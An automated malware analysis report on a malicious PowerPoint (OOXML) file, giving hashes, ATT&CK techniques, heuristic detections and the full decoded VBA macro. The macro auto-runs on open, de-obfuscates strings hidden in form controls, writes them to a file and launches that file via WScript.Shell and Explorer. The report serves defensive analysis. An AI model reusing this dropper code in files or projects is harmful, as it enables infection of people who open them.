Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 98e4b84951dc8e72…

MALICIOUS

Office (OOXML)

29.3 KB First seen: 2021-10-04
MD5: e6a75d5b92bf1c6012282c9916b574a9 SHA-1: 2275a407952c5fe9bda68a210a1fb6130cd3aa04 SHA-256: 98e4b84951dc8e72fe516d6713213b3b549c0967ed11b74d670e3fac70f2c715
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing a VBA macro with an Auto_Open subroutine. This macro utilizes WScript.Shell to execute a command, specifically 'C:\Windows\Explorer', which is likely used to launch a second-stage payload. The script also attempts to create a file with content derived from obfuscated strings, further indicating a downloader or dropper functionality.

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1550 bytes
SHA-256: ad862f65b72d8dbe55ac0e68fc21dbee933362dbb186e6663fe569ab8121f572
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Atletico"




Public Sub aUtO_oPeN()

Moushe.Show

End Sub



Attribute VB_Name = "Moushe"
Attribute VB_Base = "0{0DCD7515-314E-46BB-BB44-4762087DBB18}{DB0CD6ED-8AA6-4B31-ACE4-F991E3E40875}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Public Nonhes As New Contado

Private Sub UserForm_Terminate()

Nonhes.Ubbos

End Sub




Attribute VB_Name = "Contado"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Public Function Cebra(Cabra)

Cebra = Replace(Cabra, ":4[t6};({Nt2/&un%8+}z[7N&b}b:q", "")

End Function



Sub Ubbos()


Dim Polhen As String: Polhen = Moushe.Lechuza.Tag


Dim Pesguisas As String: Pesguisas = Cebra(Polhen)
Open Pesguisas For Output As #1


Dim Cohelho As String: Cohelho = Moushe.Lechuza.ControlTipText


Dim Savonhes As String: Savonhes = Cebra(Cohelho)
Print #1, Savonhes
Close



On Error Resume Next
AppActivate "Microsoft PowerPoint Services..."
If Err <> 0 Then
Err = 0


Set Ana = CreateObject("WScript.Shell")

Set Gold = Ana.exEc("C:\Windows\Explorer " & Pesguisas)


If Err <> 0 Then MsgBox "Can't Stop "
End If


End Sub
vbaProject_00.bin vba-project OOXML VBA project: ppt/vbaProject.bin 53760 bytes
SHA-256: 67b86d4387ff750776943cc44d1c9c2ea784f6e4b3d2b6a38e934291e4338c4d